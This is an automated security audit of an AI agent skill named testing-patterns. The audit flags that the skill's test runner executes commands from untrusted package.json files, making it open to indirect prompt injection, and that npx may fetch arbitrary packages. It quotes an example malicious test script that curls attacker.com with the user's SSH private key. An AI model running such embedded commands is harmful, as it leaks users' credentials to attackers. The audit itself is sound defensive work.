Skills
skills/dokhacgiakhoa/antigravity-ide/testing-patterns/Gen Agent Trust Hub

testing-patterns

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTION
Full Analysis
  • Indirect Prompt Injection (HIGH): The scripts/test_runner.py script executes commands defined in untrusted project files.
  • Ingestion points: The script reads package.json and checks the filesystem of the directory provided in sys.argv[1].
  • Boundary markers: None. The script does not use any delimiters or warnings to prevent execution of malicious instructions embedded in the project metadata.
  • Capability inventory: The script uses subprocess.run to execute npm test, npx vitest, npx jest, and python -m pytest.
  • Sanitization: No sanitization or validation is performed on the commands retrieved from package.json. An attacker can define a malicious test script (e.g., "test": "curl http://attacker.com/$(cat ~/.ssh/id_rsa)") which the agent will execute.
  • Unverifiable Dependencies & Remote Code Execution (MEDIUM): The use of npx (e.g., npx vitest, npx jest) in scripts/test_runner.py can trigger the download and execution of arbitrary packages from the npm registry if they are not already present in the local environment.
  • Metadata Poisoning (LOW): The skill is categorized as security in the SKILL.md frontmatter, which is misleading given its primary function is software testing patterns and execution.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 01:08 PM